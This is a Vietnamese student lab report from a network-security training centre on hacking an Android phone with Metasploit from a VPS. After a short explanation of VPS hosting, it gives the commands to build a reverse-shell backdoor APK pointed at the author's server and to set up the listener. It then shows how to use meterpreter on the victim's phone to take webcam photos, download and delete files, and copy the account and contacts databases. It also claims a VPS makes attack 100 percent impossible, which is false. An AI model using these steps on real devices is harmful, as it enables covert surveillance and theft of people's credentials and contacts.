13
Trn Xuân Lnh Lp CNTT Ca sáng 2-4-6 1 TRUNG TÂM ĐÀO TẠO QUN TRMNG VÀ AN NINH MNG QUC TATHENA BÀI BÁO CÁO 4 Hack android dùng metasploit cài trên VPS CBHD: Võ Đỗ Thng SVTT: Lê Trn Xuân Lnh

Hack android dùng metasploit cài trên VPS

  • Upload
    le-lanh

  • View
    327

  • Download
    7

Embed Size (px)

Citation preview

Page 1: Hack android dùng metasploit cài trên VPS

Lê Trân Xuân Lanh – Lớp CNTT – Ca sáng 2-4-6

1

TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH MẠNG QUỐC TẾ ATHENA

BÀI BÁO CÁO 4

Hack android dùng metasploit cài trên VPS

CBHD: Võ Đỗ Thắng

SVTT: Lê Trân Xuân Lanh

Page 2: Hack android dùng metasploit cài trên VPS

Lê Trân Xuân Lanh – Lớp CNTT – Ca sáng 2-4-6

2

Mục lục 1. VPS là gì? ..................................................................................................................................3

2. Các tính năng và lợi ích của VPS ...............................................................................................3

3. Hack android sử dụng metaspoit cài trên VPS ..........................................................................4

Page 3: Hack android dùng metasploit cài trên VPS

Lê Trân Xuân Lanh – Lớp CNTT – Ca sáng 2-4-6

3

1. VPS là gì?

Máy chủ ảo (Virtual Private Server - VPS) là phương pháp phân chia một máy chủ vật lý thành

nhiều máy chủ ảo chạy dưới dạng chia sẻ tài nguyên từ máy chủ vật lý ban đâu. Trong khi trên 1

server chạy Share Host thì có thể có hàng trăm tài khoản cùng chạy 1 lúc, nhưng trên server chạy

VPS thì con số chỉ bằng 1/10. Do vây, VPS có hiệu năng cao hơn Share Host rất nhiều lân.

Khác với hosting sử dụng phân mềm quản lý (hosting control panel) để khởi tạo và quản lý

các gói hosting, VPS được tạo ra nhờ công nghệ ảo hóa. Số lượng VPS luôn thấp hơn nhiều lân

so với số lượng hosting nếu cài đặt trên cùng một hệ thống server, do đó tính ổn định và hiệu

suất sử dụng tài nguyên của VPS luôn vượt trội so với hosting.

Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn quyền quản

lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn chế 100% khả năng bị tấn

công.

Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên

server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến các Website

khác cùng server, riêng server VPS, một tài khoản VPS bị tấn công thì mọi tài khoản VPS khác

trên server đều không bị ảnh hưởng.

2. Các tính năng và lợi ích của VPS

Toàn quyền quản lý với tính năng như một máy chủ độc lập.

Độ ổn định và bảo mật cao.

Dễ dàng nâng cấp tài nguyên mà không làm gián đoạn dịch vụ.

Quản trị từ xa, cài đặt các phân mềm và ứng dụng theo nhu câu

Kết nối Internet với 01 IP tĩnh.

Hoạt động hoàn toàn như một server riêng nên sở hữu một phân CPU riêng, dung lượng Ram

riêng, dung lượng ổ HDD riêng, địa chỉ Ip riêng và hệ điều hành riêng.

Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng khác thì có

thể cài đặt để thực hiện những nhu câu riêng như truy cập Web bằng trình duyệt Web trên VPS,

download/upload bittorent với tốc độ cao...

Trong trường hợp VPS bị thiếu tài nguyên có thể dễ dàng nâng cấp thêm tài nguyên mà không

phải khởi động lại hệ thống.

Có thể cài lại hệ điều hành vời thời gian từ 5-10 phút

Page 4: Hack android dùng metasploit cài trên VPS

Lê Trân Xuân Lanh – Lớp CNTT – Ca sáng 2-4-6

4

3. Hack android sử dụng metaspoit cài trên VPS

Trước tiên ta mở Terminal trong Kali Linux lên và gõ lệnh để tạo một backdoor:

msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.184 lport=4444 R>

/root/Desktop/app.apk

Trong đó 14.0.21.184 là địa chỉ máy VPS của ta. /root/Desktop/app.apk là đường dẫn chứa file

vừa tạo.

Sauk hi tạo một backdoor được tạo, ta tải nó lên mạng.

Chờ máy android down về cài đặt và truy cập vào thì sẽ hiện lên như bên dưới:

Page 5: Hack android dùng metasploit cài trên VPS

Lê Trân Xuân Lanh – Lớp CNTT – Ca sáng 2-4-6

5

Ta vào máy VPS và mở Metasploit Console lên

Sau đó ta sẽ đánh các lệnh như bên dưới để tạo một liên kết với máy android mà ta sẽ hack:

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 14.0.21.184

set lport 4444

run

Page 6: Hack android dùng metasploit cài trên VPS

Lê Trân Xuân Lanh – Lớp CNTT – Ca sáng 2-4-6

6

Chú ý: lhost và lport phải giống với lhost và lport khi tạo backdoor

Khi máy android nhấp vào biểu tượng có chữ ReverseTCP thì sẽ có thông báo là đa kết nối

Page 7: Hack android dùng metasploit cài trên VPS

Lê Trân Xuân Lanh – Lớp CNTT – Ca sáng 2-4-6

7

Ta gõ lệnh help để hiện lên các lệnh mà ta có thể sử dụng để hack android

Ta dùng lệnh sysinfo để xem thông tin máy android

Ta dùng lênh webcam_list để xem danh sách các camera

Page 8: Hack android dùng metasploit cài trên VPS

Lê Trân Xuân Lanh – Lớp CNTT – Ca sáng 2-4-6

8

Ta dùng lệnh webcam_snap x để chụp một bức ảnh từ camera của máy android.

Trong đó: x là 1: Back Camera

2: Front Camera

Để di chuyển đến thư mục nào ta dụng lệnh cd <đường dẫn đến thư mục>

Lệnh ls để xem trong thư mục có những gì

Page 9: Hack android dùng metasploit cài trên VPS

Lê Trân Xuân Lanh – Lớp CNTT – Ca sáng 2-4-6

9

Ta vào thư mục /sdcard/Download để down file về

Ta dùng lệnh download <tên file> để down file đó về máy VPS của ta

Muốn xóa một file ta dùng lệnh rm <tên file>

Để đánh cắp tài khoản trước tiên ta phải vào hệ thống của máy android. Lưu ý: máy android này

phải được root trước đó.

Page 10: Hack android dùng metasploit cài trên VPS

Lê Trân Xuân Lanh – Lớp CNTT – Ca sáng 2-4-6

10

Ta dùng lênh shell để vào hệ thống

Dùng lệnh su để toàn quyền truy cập

Dùng lệnh whoami để biết máy android đa được root chưa. Nếu rồi thì nó sẽ hiện thông báo là

unknown uid 0

Ta gõ cd /data/system để vào thư mục system

Tiếp theo gõ ls –l để xem trong thư mục có gì

Page 11: Hack android dùng metasploit cài trên VPS

Lê Trân Xuân Lanh – Lớp CNTT – Ca sáng 2-4-6

11

Ta gõ lệnh cp accounts.db /sdcard để copy file accounts.db về Sdcard

Sau đó ta trở về meterpreter bằng lệnh exit rồi dùng lệnh

download file accounts.db về máy VPS của chúng ta

Tiếp tục ta vào địa chỉ

/data/data/com.android.providers.contacts/databases

Page 12: Hack android dùng metasploit cài trên VPS

Lê Trân Xuân Lanh – Lớp CNTT – Ca sáng 2-4-6

12

để copy file contacts2.db về Sdcard

Sau đó ta download file contacts2.db về máy VPS

Page 13: Hack android dùng metasploit cài trên VPS

Lê Trân Xuân Lanh – Lớp CNTT – Ca sáng 2-4-6

13

Bên dưới là danh sách danh bạ ta down từ máy android đa được root. Ta mở file *.db bằng phân

mềm SQLite. Ta có thể down phân mềm đó về vài cài vào VPS của chúng ta

Hết